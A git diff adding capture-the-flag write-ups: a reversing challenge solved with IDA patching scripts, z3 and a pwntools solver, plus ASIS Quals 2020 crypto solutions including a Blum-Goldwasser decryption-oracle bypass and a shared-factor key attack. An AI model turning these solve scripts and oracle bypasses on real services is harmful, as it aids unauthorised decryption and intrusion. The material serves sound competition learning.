+ - If they're non-zero, the chunk references a certain amount of bytes *from the output that was already written, relative to the end of the output buffer*. Both the size and the relative offset are encoded in a variable-length scheme.
+ - The contents of the output buffer are `memmove`d instead of `memcpy`'d. Special care has to be taken for cases where the source and destination memory ranges overlap, which can and does happen.
+- The very first chunk is always treated as constant data. Its 3 most significant bits instead set what we call the `big_chungus` flag (`True` if they are equal to 1, `False` if 0, error if they're set to anything else). This flag appears to enable some additional variable-length encoding of sizes and offsets, and always seems to be set to true in the binaries we were given. The unpacking function in the binary, `sub_404740`, in fact calls one of two different functions: the big-chungus-enabled `sub_403E50` or the apparently unused `sub_402760`.
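
To make the overlap issue from the list above concrete, here is a small sketch (the helper names `split_chunk_header` and `copy_backref` are ours, not from the binary). It splits a chunk's first byte into its 3-bit type and 5-bit low part, and shows why a back-reference whose size exceeds its distance has to be copied byte by byte: the copy reads bytes it has just written, which a single slice copy cannot do.

```python
def split_chunk_header(first_byte: int):
    """Return (high 3 bits, low 5 bits) of a chunk's first byte."""
    return first_byte >> 5, first_byte & 0x1F


def copy_backref(out: bytearray, distance: int, size: int) -> None:
    """Append `size` bytes starting `distance` bytes before the end of `out`.

    Copying one byte at a time lets the source run into freshly written
    output, which repeats the last `distance` bytes as a pattern.
    """
    assert 0 < distance <= len(out)
    start = len(out) - distance
    for i in range(size):
        out.append(out[start + i])


# Overlapping reference: only 2 bytes exist, but 5 are requested.
out = bytearray(b"ab")
copy_backref(out, distance=2, size=5)
print(out)

# A naive slice copy only sees the 2 bytes that existed beforehand.
naive = bytearray(b"ab")
naive += naive[0:5]
print(naive)
```

This is the reason the unpacker has the commented-out slice-based variant replaced by an explicit loop.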
+
+I patched out the anti debugging checks and signal handlers and started debugging.
+I dumped the unpacked code into a binary file and loaded it into IDA once again.
+I also continued debugging the unpacked code. It was really annoying to debug and statically analyze, since most functions have the following snippet interspersed every few instructions:
+
+```x86asm
+nullsub_428:
+ ret
+
+call nullsub_428
+call sub_2258E
+
+sub_2258E:
+ add qword ptr [rsp+0], 1
+ retn
+```
+
+Basically, this skips over the byte after the second call and hence IDA cannot really reconstruct the control flow / figure out where instructions are. However, this is nothing a little IDA scripting can't fix ;):
+
+```python
+import binascii
+import idaapi
+import ida_funcs
+import ida_bytes
+import idc
+import logging
+log = logging.getLogger("patching")
+
+shitty_func = binascii.unhexlify("4883042401C3")
+
+def run(start, end):
+    log.info("Running from 0x%x - 0x%x", start, end)
+    curr = start
+    while curr != idaapi.BADADDR and curr < end:
+        # make code
+        # idaapi.del_items(curr)
+        insn = idaapi.insn_t()
+        ret = idaapi.create_insn(curr, insn)
+        if ret == 0:
+            idaapi.del_items(curr, 8)
+            idaapi.del_items(curr+1, 8)
+            ret = idaapi.create_insn(curr, insn)
+            if ret == 0:
+                log.error("Failed to create instruction at 0x%x", curr)
+                return
+        # insn_size = ret
+        next_ea = idaapi.get_first_cref_from(curr)
+        # if call, check if skip next byte
+        if idaapi.is_call_insn(insn):
+            call_addr = insn.Op1.addr
+            is_skip = True
+            log.info("Shitty func: %s", shitty_func.hex())
+            for i, c in enumerate(shitty_func):
+                if idaapi.get_byte(call_addr + i) != c:
+                    log.info("Mismatched")
+                    is_skip = False
+                    break
+            if is_skip:
+                log.info("Identified skip call @ 0x%x", curr)
+                idaapi.patch_byte(curr, 0xe9)
+                idaapi.patch_byte(curr + 1, 0x01)
+                idaapi.del_items(curr)
+                idaapi.create_insn(curr, insn)
+                next_ea += 1
+        log.info("Next ea: 0x%x", next_ea)
+        # return
+        curr = next_ea
+        # patch to jmp rel
+        # else inc curr
+
+run(0x0, 0x222C8)
+```
+
+Basically, this goes through the instructions and if it sees a call to such a function, it patches it with a jmp to the next byte. Armed with this and debugging some more, it becomes apparent what the function does (manual decompilation):
+
+```c
+int user[2];
+int final[2] = {};
+
+read(0, user, 8);
+sub_223F3(user);
+sub_0(final);
+if (final[0] == user[0] && final[1] == user[1]) {
+ puts("Right!");
+} else {
+ puts("Wrong!");
+}
+```
+
+Unfortunately, for the longest time, I thought that sub_0 was getting called with our input and not zeroes (more on that later). In any case, I tried running angr on it, but it seemed to not really work. One issue was that sub_0 actually has a lot of int 3 instructions. I tried doing the following to implement the sighandler from the binary, but I still didn't get an answer[^2]:
+
+```python
+import angr
+
+class SimEngineFailure(angr.engines.engine.SuccessorsMixin):
+    def process_successors(self, successors, **kwargs):
+        state = self.state
+        jumpkind = state.history.parent.jumpkind if state.history and state.history.parent else None
+
+        if jumpkind is not None:
+            if jumpkind == "Ijk_SigTRAP":
+                # emulate the SIGTRAP handler: *0xDEAD0000 ^= 0xDEADBEEF, then continue
+                val = state.mem[0xDEAD0000].dword
+                state.mem[0xDEAD0000].dword = val.resolved ^ 0xDEADBEEF
+                self.successors.add_successor(state, state.regs.rip, state.solver.true, 'Ijk_Boring')
+                self.successors.processed = True
+                return
+
+        return super().process_successors(successors, **kwargs)
+
+
+class UberUberEngine(SimEngineFailure, angr.engines.UberEngine):
+    pass
+
+```
+
+So I started reversing sub_0 manually (still thinking it depended on our input and hence we would need to know what it does). Unfortunately, even with the patched binary, IDA still didn't want to include all of the code in the function, so some more scripting later, I was finally able to hit decompile on the whole thing:
+
+```python
+# `f` (the func_t of sub_0) and `curr` (the first address to append) are
+# expected to be set up in the IDA console before running this.
+def find_prev_next(addr):
+    res = idaapi.BADADDR
+    for i in range(10):
+        res = idaapi.get_first_cref_from(addr-i)
+        if res != idaapi.BADADDR:
+            return res
+    return res
+
+def append_chunk(curr):
+    if idaapi.append_func_tail(f, curr, idaapi.BADADDR):
+        print(f.tails.count)
+        print(f.tails[f.tails.count-1].start_ea)
+        end_ea = f.tails[f.tails.count-1].end_ea
+        print(hex(end_ea))
+        next_ea = find_prev_next(end_ea)
+        return next_ea
+    return None
+
+for i in range(400):
+    curr = append_chunk(curr)
+    # stop if the tail could not be appended or no successor was found
+    if curr is None or curr == idaapi.BADADDR:
+        print("ERROR")
+        break
+```
+
+Before being able to hit F5 and see something, I had to increase the max function size in IDA (this was already very promising), but I finally got to see it in all its glory:
+
+```c
+__int64 __fastcall sub_0(__int64 a1)
+{
+ v603 = *(_DWORD *)a1 ^ *(_DWORD *)(a1 + 4);
+ nullsub_1(a1);
+ dword_DEAD0000 = v603 - 471 + 261;
+ __debugbreak();
+ v604 = (((dword_DEAD0000 - 396) & 0x7D ^ 0xCA | 0x1E1u) >> 2) | (((dword_DEAD0000 - 396) & 0x7D ^ 0xCA | 0x1E1) << 6);
+ nullsub_2();
+ nullsub_3();
+ dword_DEAD0000 = v604 / 0x1DF / 0x2E % 0x34;
+ __debugbreak();
+ v605 = (((unsigned int)dword_DEAD0000 >> 2) | (dword_DEAD0000 << 6)) % 0x25;
+ nullsub_4();
+ dword_DEAD0000 = ((((v605 - 292) % 0x16A) | 0x30) + 208) & 0x22;
+ __debugbreak();
+ dword_DEAD0000 = (((dword_DEAD0000 + 137) | 0xB9) ^ 0x166) + 67;
+ __debugbreak();
+ dword_DEAD0000 = (8 * (dword_DEAD0000 & 0x19E)) | ((unsigned __int16)(dword_DEAD0000 & 0x19E) >> 5);
+ __debugbreak();
+ v1 = (unsigned int)dword_DEAD0000 >> 5;
+ v606 = ((((((unsigned int)v1 | (8 * dword_DEAD0000)) ^ 0x1D8 | 0x33) + 87) % 0x2A / 0x1C5) ^ 0x25) % 0x7B;
+ // ---------------------------------
+ // ... around 2500 lines of this lol
+ // ---------------------------------
+ v602 = ((797940 * ((((unsigned int)v251 | (16 * v601)) + 293) & 0x1B6) - 477) << 6) | ((797940
+ * ((((unsigned int)v251 | (16 * v601))
+ + 293) & 0x1B6)
+ - 477) >> 2);
+ v723 = (((2 * v602) | (v602 >> 7)) >> 6) | (4 * ((2 * v602) | (v602 >> 7)));
+ *(_DWORD *)a1 = v723 - 0x50EF943B;
+ result = a1 + 4;
+ *(_DWORD *)(a1 + 4) = v723 - 0x6F1DB3B;
+ return result;
+}
+```
+
+Obviously, this was not going to be possible to reverse by hand. However, it seemed to be just constant operations. Just for the fun of it, I added two rules to the aforementioned deobfuscation plugin:
+
+- replace nullsubs with nops
+- replace __debugbreak with `*0xDEAD0000 ^= 0xDEADBEEF`
+
+I did this by adding the following to `chain_rules.py`:
+
+```python
+class NullSubChain(ChainSimplificationRule):
+    DESCRIPTION = "Replace calls to nullsubs with nops"
+
+    def check_and_replace(self, blk: mblock_t, ins: minsn_t):
+        if blk is None:
+            return None
+        mba: mba_t = blk.mba
+        if mba.maturity != MMAT_PREOPTIMIZED:
+            return None
+        if ins.opcode == m_call:
+            left: mop_t = ins.l
+            if left.t == mop_v:
+                name = idaapi.get_name(left.g)
+                if "nullsub" in name:
+                    chain_logger.info("Found nullsub call at 0x%x", ins.ea)
+                    blk.make_nop(ins)
+                    return None #??
+
+        return super().check_and_replace(blk, ins)
+
+class DebugBreakChain(ChainSimplificationRule):
+    DESCRIPTION = "Replace calls to debugbreak with sigtrap handler implementation"
+
+    def check_and_replace(self, blk: mblock_t, ins: minsn_t):
+        if blk is None:
+            return None
+        mba: mba_t = blk.mba
+        if mba.maturity != MMAT_PREOPTIMIZED:
+            return None
+        if ins.opcode == m_call:
+            left: mop_t = ins.l
+            if left.t == mop_h:
+                if left.helper == "__debugbreak":
+                    chain_logger.info("Found debugbreak at 0x%x", ins.ea)
+                    new_insn = minsn_t(ins.ea)
+                    new_insn.opcode = m_xor
+                    new_insn.l.make_gvar(0xdead0000)
+                    new_insn.l.size = 4
+                    new_insn.r.make_number(0xdeadbeef, 4)
+                    new_insn.d.make_gvar(0xdead0000)
+                    new_insn.d.size = 4
+                    return new_insn
+
+        return super().check_and_replace(blk, ins)
+```
+
+I was not expecting that much, but after hitting F5 (and waiting like 2 minutes):
+
+```c
+__int64 __fastcall sub_0(__int64 a1)
+{
+ __int64 result; // rax
+
+ dword_DEAD0000 = 0xDEADBEE0;
+ *(_DWORD *)a1 = 0x2B106BC4;
+ result = a1 + 4;
+ *(_DWORD *)(a1 + 4) = 0x750E24C4;
+ return result;
+}
+```
+
+And then I realized: the whole computation is constant, so this function just overwrites our input buffer with the constants seen above. My teammate wrote a quick binary that mmaps the unpacked shellcode, runs the `sub_0` function and prints the resulting values:
+
+```c
+#include <err.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sysexits.h>
+
+static int* const deadpage = (void*)0xdead0000;
+
+/* Emulates the challenge's SIGTRAP handler: each int3 flips the dead page. */
+void handler(int sig) {
+    *deadpage ^= 0xdeadbeef;
+}
+
+int main(int argc, char** argv) {
+    if (argc != 2) {
+        errx(EX_USAGE, "usage: %s ", argv[0]);
+    }
+
+    int fd = open(argv[1], O_RDONLY);
+    if (fd < 0) {
+        err(EX_NOINPUT, "couldn't open file");
+    }
+
+    /* Map the unpacked shellcode as executable memory. */
+    void *mem = mmap(NULL, 0x100000, PROT_READ | PROT_EXEC, MAP_FILE | MAP_PRIVATE, fd, 0);
+    if (mem == MAP_FAILED) {
+        err(EX_OSERR, "couldn't map file");
+    }
+
+    void *deadmapping = mmap(deadpage, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
+    if (deadmapping == MAP_FAILED) {
+        err(EX_OSERR, "couldn't map 0xdead....");
+    }
+    if (deadmapping != deadpage) {
+        // what is MAP_FIXED lol
+        errx(EX_OSERR, "couldn't actually map 0xdead....");
+    }
+
+    /* signal() returns SIG_ERR on failure, not a non-zero status. */
+    if (signal(SIGTRAP, handler) == SIG_ERR) {
+        err(EX_OSERR, "couldn't install signal handler");
+    }
+
+    int buf[2] = {0};
+    ((void(*)(int*))mem)(buf);
+    printf("%08x %08x\n", buf[0], buf[1]);
+}
+```
+
+The final piece of the puzzle was function `sub_223F3`, which actually does something with our input. Fortunately, it seemed to be exactly the same for every binary. I translated it into z3 and was able to solve for our input (after wasting some time debugging why it wasn't working, because I mistyped v1 as v4):
+
+```python
+import z3
+from pwn import *
+
+def hiword(val):
+    return z3.Extract(31, 16, val)
+
+def loword(val):
+    return z3.Extract(15, 0, val)
+
+def toint(val):
+    num = val.size()
+    if num == 32:
+        return val
+    return z3.ZeroExt(32-num, val)
+
+def thingy(a, b, cond, c):
+    return z3.If(cond != 0,
+        toint(a) - toint(b) - (z3.LShR(toint(a) - toint(b), 16)),
+        toint(c)
+    )
+
+def wtf(num):
+    x = z3.BitVecVal(num, 32)
+    res = z3.simplify(toint(loword(x)) - toint(hiword(x)) - (z3.LShR(toint(loword(x)) - toint(hiword(x)), 16)))
+    return res.as_long()
+
+def do_solve(t1, t2):
+    inp = []
+    for i in range(2):
+        inp.append(z3.BitVec(f'inp_{i}', 32))
+    a1 = inp
+    v1 = a1[1]
+    v2 = 7 * toint(hiword(a1[0]))
+    v3 = thingy(loword(v2), hiword(v2), v2, -6 - toint(hiword(a1[0])))
+    v4 = a1[0] + 6
+    v5 = toint(hiword(v1)) + 5
+    v6 = toint(4 * toint(loword(v1)))
+
+    v1 = thingy(loword(v6), hiword(v6), v6, -3 - toint(loword(v1)))
+
+    v7 = toint(3 * toint(loword(v3 ^ v5)))
+    v8 = thingy(loword(v7), hiword(v7), v7, -3 - toint(loword(v3 ^ v5)))
+
+    v9 = toint(loword(v8 + (v1 ^ v4)))
+    r1 = loword(2*v9)
+    r2 = loword(z3.LShR(toint(2*v9), 16))
+    v10 = thingy(r1, r2, 2*v9, ~v9)
+    s = z3.Solver()
+    res1 = (z3.ZeroExt(16, loword(v5 ^ v10)) | ((v10 ^ v3) << 16))
+    res2 = ((toint(loword((v10 + v8) ^ v1))) | (((v10 + v8) ^ v4) << 16))
+    s.assert_and_track(t1 == res1, "res1")
+    s.assert_and_track(t2 == res2, "res2")
+    assert s.check() == z3.sat
+    m = s.model()
+    nums = [m.eval(i).as_long() for i in inp]
+    in_val = b""
+    for num in nums:
+        in_val += p32(num)
+    return in_val
+```
+
+With all of that done, we can now write our exploit script and get the flag :):
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template --host 111.186.58.164 --port 30212
+from pwn import *
+from hashlib import sha256
+from itertools import product
+import re
+from pwnlib.tubes.tube import tube
+# import pow
+
+# Set up pwntools for the correct architecture
+context.update(arch='i386')
+exe = './path/to/binary'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+# ./exploit.py GDB HOST=example.com PORT=4141
+host = args.HOST or '111.186.58.164'
+port = int(args.PORT or 30212)
+
+def local(argv=[], *a, **kw):
+    '''Execute the target binary locally'''
+    if args.GDB:
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe] + argv, *a, **kw)
+
+def remote(argv=[], *a, **kw):
+    '''Connect to the process on the remote host'''
+    io = connect(host, port)
+    if args.GDB:
+        gdb.attach(io, gdbscript=gdbscript)
+    return io
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.LOCAL:
+        return local(argv, *a, **kw)
+    else:
+        return remote(argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+
+def solve_proof_of_work(hashable_suffix, hash) :
+    alphabet = (string.ascii_letters + string.digits + '!#$%&*-?')
+    for hashable_prefix in product(alphabet, repeat=4) :
+        current_hash_in_hex = sha256((''.join(hashable_prefix) + hashable_suffix).encode()).hexdigest()
+        if current_hash_in_hex == hash :
+            return ''.join(hashable_prefix)
+
+
+io = start()
+
+proof_of_work_line = io.recvline(keepends=False).decode("utf-8")
+io.recvline()
+hashable_suffix = re.search(r'sha256\(XXXX\+(.*)\) ==', proof_of_work_line).group(1)
+hash = re.search(r'== (.*)', proof_of_work_line).group(1)
+log.info("Solving POW %s for %s", hashable_suffix, hash)
+proof = solve_proof_of_work(hashable_suffix, hash)
+io.sendline(proof)
+io: tube
+
+import base64
+
+def read_challenge():
+    io.readuntil("Here is your challenge:")
+    # swallow 2 newlines
+    io.recvline()
+    io.recvline()
+    challenge = io.recvline()
+    return base64.b64decode(challenge)
+
+for i in range(3):
+
+    log.info("Downloading challenge %d", i)
+    chal1 = read_challenge()
+    with open(f"chal{i}", "wb") as f:
+        f.write(chal1)
+
+    import unpack
+    log.info("Unpacking challenge")
+    unpacked = unpack.unpack(chal1)
+
+    with open(f"chal{i}_unpacked", "wb") as f:
+        f.write(unpacked)
+
+    log.info("Running wrapper")
+    p = process(["./wrapper", f"chal{i}_unpacked"])
+    res1 = p.readuntil(" ")
+    res1 = int(res1, 16)
+    res2 = p.readuntil("\n")
+    res2 = int(res2, 16)
+
+    log.info("Targets: 0x%x, 0x%x", res1, res2)
+
+    import do_solve
+    sender = do_solve.do_solve(res1, res2)
+
+    io.send(sender)
+
+io.interactive()
+```
+
+[^1]: For some reason I tried making a fast GPU based POW solver, turns out it's slower than just python hashlib :face_palm:
+
+[^2]: This was probably for other reasons, angr did manage to work later on.
diff --git a/ASIS-Quals-2020/index.html b/ASIS-Quals-2020/index.html
new file mode 100755
index 0000000..2ef0b85
--- /dev/null
+++ b/ASIS-Quals-2020/index.html
@@ -0,0 +1,1059 @@
+ASIS Quals 2020 | Organisers
A handful of write ups from some of the crypto challenges from ASIS 2020 Quals. Thanks to Aurel, Hrpr and Hyperreality for the tips while solving these. Cr0wn came 16th overall, and I learnt that I really need to get to grips with multivariate polynomials because Tripolar was solved by a bunch of teams and I just couldn’t crack it…
The value of r is small, r = random.randint(12, 19), and we also have $e - 1 = 2^{16}$, so $m = \frac{1-e}{2^r}$ is, up to sign, a power of two. The actual value of $m$ isn’t needed, as we can simply expand out $t_p^e$ and write down
+
+\[\begin{align}
+t_p^e - 1 = s p \cdot (s^{m-1} p^{m-1} + \ldots + m) \mod n \\
+\end{align}\]
+
+
We see that $n$ and $t_p^e - 1$ share a common factor of $p$, and we can solve the challenge from
+
+\[\gcd(t_p^e - 1, n) = p\]
+
+
Note: we can only treat $p$ as a true factor in the above line as $n = p\cdot q$, so by nature of the CRT, this expression simplifies.
The hard part of this challenge was dealing with boring bugs when sending data to the server while resolving the proof of work. Once we connected to the server and passed the proof of work, we were given the prompt
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ hi! There are three integer points such that (x, y), (x+1, y), and +
++ (x+2, y) lies on the elliptic curve E. You are given one of them!! +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+| One of such points is: P = (68363894779467582714652102427890913001389987838216664654831170787294073636806, 48221249755015813573951848125928690100802610633961853882377560135375755871325)
+| Send the 37362287180362244417594168824436870719110262096489675495103813883375162938303 * P :
+
+
+
So the question is, given a single point $P$, together with the knowledge of the placement of three points, can we uniquely determine the curve?
+
+
If we assume the curve is over some finite field with prime characteristic, and that as standard this challenge uses a curve of Weierstrass form, we know we are looking for curves of the form
+
+\[y^2 = x^3 + Ax + B \mod p\]
+
+
and from the knowledge of the three points we have
+
+\[x^3 + Ax + B = (x+ 1)^3 + A(x+1) + B = (x + 2)^3 + A(x + 2) + B \mod p\]
+
+
and from the above we have $x = -1 \Rightarrow A = -1$. The only thing left to do is to find $B$, which we can see is recovered from the general form of the curve.
Now that we have recovered the initial point, we see that the triple of points is $(-1, y)$, $(0, y)$ and $(1,y)$. The last two of these points would be trivial to spot and we can see this isn’t what the server is sending us. We can then know for certain that the given point is $(x_0, y_0) = (-1, y)$, which gives the characteristic as $p = x_0 + 1$.
With everything now understood, we can take the point given by the server, together with the given scale factor, compute the scalar multiplication and send the new point back to the server
+
+
Implementation
+
+
import os
+os.environ["PWNLIB_NOTERM"]="True"
+
+import hashlib
+import string
+import random
+from pwn import *
+
+IP="76.74.178.201"
+PORT=9531
+r=remote(IP,PORT,level="debug")
+POW=r.recvline().decode().split()
+x_len=int(POW[-1])
+suffix=POW[-5]
+hash_type=POW[-7].split('(')[0]
+
+"""
+The server asks for a random length string, hashed with a random hash
+function such that the last 3 bytes of the hash match a given suffix.
+"""
+while True:
+    X=''.join(random.choices(string.ascii_letters+string.digits,k=x_len))
+    h=getattr(hashlib,hash_type)(X.encode()).hexdigest()
+    if h.endswith(suffix):
+        print(h)
+        break
+
+r.sendline(X)
+
+header=r.recvuntil(b'One of such points')
+
+points=r.recvline().split(b'P = (')[-1]
+points=points.split(b', ')
+px=Integer(points[0])
+py=Integer(points[-1][:-2])
+
+scale_data=r.recvline().split(b' ')
+scale=Integer(scale_data[3])
+
+p=px+1
+assert p.is_prime()
+a=-1
+b=(py^2-px^3-a*px)%p
+E=EllipticCurve(GF(p),[a,b])
+P=E(px,py)
+
+Q=P*scale
+
+"""
+For some reason sending str(Q.xy()) to the server caused an error, so I
+just switched to interactive and sent it myself. I'm sure it's a dumb
+formatting bug, but with the annoying POW to deal with, I can't be bothered
+to figure it out...
+"""
+# r.sendline(str(Q.xy()))
+print(Q.xy())
+r.interactive()
+
Which for reasons below, I will now refer to as the modulus $n$. Sending the option F, we get the encryption of the flag, again with pubkey as a label, but from the encryption function, we know that this value is (or at least should be) $s_{t+1} = s_t^2 \mod n$. Not sure why ASIS chose this confusing notation…
Lastly sending the option D we are given the prompt
+
+
| send an pair of integers, like (c, x), that you want to decrypt:
+
+
+
Being a wise guy, I tried sending the flag back to the server, but I was given the message
+
+
| this decryption is NOT allowed :P
+
+
+
Solving this challenge was easy after a bit of googling to try and see what this crypto system was. I noticed that the key stream was generated using a random number generator called Blum Blum Shub. Looking for when this was used as a keystream, I stumbled upon the Blum-Goldwasser Cryptosystem and spending a little bit of time reading the Wikipedia page, I could tell that this was the right choice.
+
+
Adaptive chosen ciphertext attack
+
+
Reading more closely, I spotted that the BG implementation is insecure against adaptive chosen ciphertext attacks, where the attacker has access to a decryption oracle. This sounds great!!
+
+
The idea is that to decrypt some ciphertext $(\vec{c}, s)$, one can pick a generic ciphertext using the same seed $(\vec{a}, s)$ and then use the decryption oracle to find $m^\prime$. As the seed is the same, both $m^\prime$ and the flag $m$ have been encrypted with the same keystream and we can obtain the flag from $m = \vec{a} \oplus \vec{c} \oplus m^\prime$.
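
The keystream-reuse identity can be checked in a few lines of Python. This is only a sketch: the keystream and the message below are made-up toy values standing in for the server's secret data, and `xor_bytes` is a hypothetical helper.

```python
import os

def xor_bytes(x: bytes, y: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    return bytes(i ^ j for i, j in zip(x, y))

# Toy stand-ins (assumptions): a secret keystream and the message it hides.
keystream = os.urandom(8)
m = b"ASIS{ok}"
c = xor_bytes(m, keystream)          # flag ciphertext, produced from seed s

a = bytes(8)                         # any ciphertext of our choosing
m_prime = xor_bytes(a, keystream)    # what a decryption oracle would return

# m = a xor c xor m', because the keystream cancels out.
recovered = xor_bytes(xor_bytes(a, c), m_prime)
print(recovered)
```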
+
+
This sounds easy! Let’s go back to the server and generate $m^\prime$:
+
+
| send an pair of integers, like (c, x), that you want to decrypt:
+(513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910, 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733)
+| this decryption is NOT allowed :P
+
+
+
Uh oh… it seems that the server checks the seed value and doesn’t let us use this attack…
+
+
Just one more block
+
+
Okay, so if we can’t use the same $s$ as the flag encryption, and we can’t factor $n$ (waaaaaaay too big) what options do we have?
+
+
I dunno if this attack has a proper name, but I realised we could fool the server into decrypting the flag by adding a block to the end of the ciphertext. For every block that is encoded, the encryption protocol takes $s_i$ and calculates $s_{i+1} = s_i^2 \mod n$. As a result, if the ciphertext being decoded was exactly one block longer, then the seed value we would supply to the oracle wouldn’t be $s$, but rather $s^2 \mod n$.
+
+
As we know ct, s, n we control enough data to solve the challenge, assuming that the server doesn’t tell us off for sending $s^2 \mod n$…
+
+
So, this should bypass the seed check in the oracle and allow us to decrypt the flag. All we need to do is take the pair (ct, s) from the server, together with the modulus n, add h bits to the end of ct and square s. Sending this to the oracle will decrypt our ciphertext block by block; we can then remove the last h bits (which will have decoded to garbage) and grab the flag.
Using the data collected above, sending our slightly longer ciphertext to the server gives us a decrypted message:
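
To convince yourself that the extra block really leaves the earlier blocks intact, here is a toy Blum-Goldwasser sketch. Everything in it is an assumption made for illustration: the tiny primes, the 4-bit block size, the list-of-blocks encoding and the `oracle` wrapper are not the server's actual code.

```python
# Toy Blum-Goldwasser, only to illustrate the "one more block" trick.
P, Q = 499, 547            # small primes, both congruent to 3 mod 4
N = P * Q
H = 4                      # keystream bits taken per block
MASK = (1 << H) - 1

def encrypt(blocks, x0):
    """Return (ciphertext blocks, final state s)."""
    x, out = x0, []
    for m in blocks:
        x = x * x % N
        out.append(m ^ (x & MASK))
    return out, x * x % N

def decrypt(blocks, s):
    """Undo the squarings modulo P and Q, rebuild x0 by CRT, then unmask."""
    t = len(blocks)
    up = pow(s, pow((P + 1) // 4, t + 1, P - 1), P)
    uq = pow(s, pow((Q + 1) // 4, t + 1, Q - 1), Q)
    x = (up * Q * pow(Q, -1, P) + uq * P * pow(P, -1, Q)) % N
    out = []
    for c in blocks:
        x = x * x % N
        out.append(c ^ (x & MASK))
    return out

flag_blocks = [0xA, 0x3, 0xF]
ct, s = encrypt(flag_blocks, pow(1234, 2, N))

def oracle(blocks, seed):
    """Decryption oracle that refuses the flag's own seed."""
    if seed == s:
        raise ValueError("this decryption is NOT allowed :P")
    return decrypt(blocks, seed)

# Append one dummy block and square the seed; the last block decodes to garbage.
extended = oracle(ct + [0], s * s % N)
print(extended[:-1])
```

The oracle sees a seed it has never handed out, yet it walks back to the same starting state, so every block except the appended one decrypts as before.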
+
+
(1050694431070872155001756216425859106009149475714472148724558831698025594003020289342228092908499451910230246466966535462383661915927210900686505951973098101821428690234494630586161474620221219599667982564625658263117243853548793491962157712885841765025507579474134243913651028278843209727, 3216641374118298063210229377328115445643813442578456023987769065661762517695051834586452075939576983800791011462122765510295327568646398522659752628912802933208909111321539625480585977865621874640928715606628766855738533853630742505790835948213775188951805695531626048779789826277990208281243968206104294503971898862963118207505455918079294280929081526755227996190831742555093366364879064928874861060462753403017976763786404530509469825731935018035684983539175758425557263211403465858234005521025395515018046387350089113701767863479780051534190944394815574406100307489105693633714510667995574063150674428700480235811)
+| the decrypted message is: 47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+
+
+
Then we can simply grab the flag after chopping off 11 bits
+
+
>>> from Crypto.Util.number import long_to_bytes
+>>>flag_ext=47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+>>> flag_bin = bin(flag_ext)[2:-11]
+>>> flag_int = int(flag_bin, 2)
+>>> flag = long_to_bytes(flag_int)
+>>> print(flag)
+b'((((......:::::: Great! the flag is: ASIS{BlUM_G0ldwaS53R_cryptOsySt3M_Iz_HI9hlY_vUlNEr4bl3_70_CCA!?} ::::::......))))'
+
+
+
No pwntools cracked out to do this one in a stylish way, but we still grab the flag!
After solving Jazzy there’s not much to this challenge. We know that it is an implementation of Blum-Goldwasser (albeit with an additional xorkey). Blum-Goldwasser’s security relies on the hardness of factoring $n = p\cdot q$ and so our best chance to solve this puzzle is to find the factors of the pubkey.
+
+
Looking at the challenge, we see we are given many many instances of the encryption. With all of these public keys, wouldn’t it be a shame if some of them shared a factor?
+
+
Putting the data into an array, I checked for common factors using gcd in the following way:
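
A pairwise gcd check along these lines could look like the sketch below. The function name `shared_factors` and the toy moduli are assumptions for illustration; the real public keys come from the challenge data.

```python
from itertools import combinations
from math import gcd

def shared_factors(moduli):
    """Return {index: (p, q)} for every modulus that shares a prime with another."""
    found = {}
    for (i, a), (j, b) in combinations(enumerate(moduli), 2):
        g = gcd(a, b)
        if 1 < g < min(a, b):
            found[i] = (g, a // g)
            found[j] = (g, b // g)
    return found

# Toy public keys (assumption): the first and third share the prime 101.
pubkeys = [101 * 103, 107 * 109, 101 * 113]
print(shared_factors(pubkeys))
```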
With the crypto system all sorted out and checked against the encryption function (without the xorkey) we just need to find a way to do this last step. I started trying to think of a clever way to undo the xor with knowledge of several ct / msg pairs (many of the public keys share common factors) but then I realised that the block size is only 10 bits long and a brute force of xorkey would only mean guessing 1024 values.
+
+
So, I took the easy way and included a loop inside my decrypt trying all values for the xorkey and storing any decryptions that had the flag format: ASIS{. The script takes seconds and finds the flag.
Disclaimer: I didn’t solve this challenge during the competition and it took me reading a writeup to understand how this challenge works. I’m writing it up to talk myself through the solution, and maybe someone else will read this and be surprised by the solution too.
+
+
After working through this, my take away is that my intuition for cube roots was way off! The key for solving this challenge is that given a polynomial of the form
+
+\[f(x, y, z) = x^3 + y^2 + z\]
+
+
One can recover the value of $x$ from taking the cube root of $f(x,y,z)$. Even after I read this, I couldn’t believe there wasn’t some loss of information of the LSB of $x$, but it seems like it holds, even for small positive integers
The same is true for quadratic terms, by looking at the square root of $f - x^3$, but here there seems to be a bit less certainty and we find with small enough inputs, the square root approximation can be off by 1.
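
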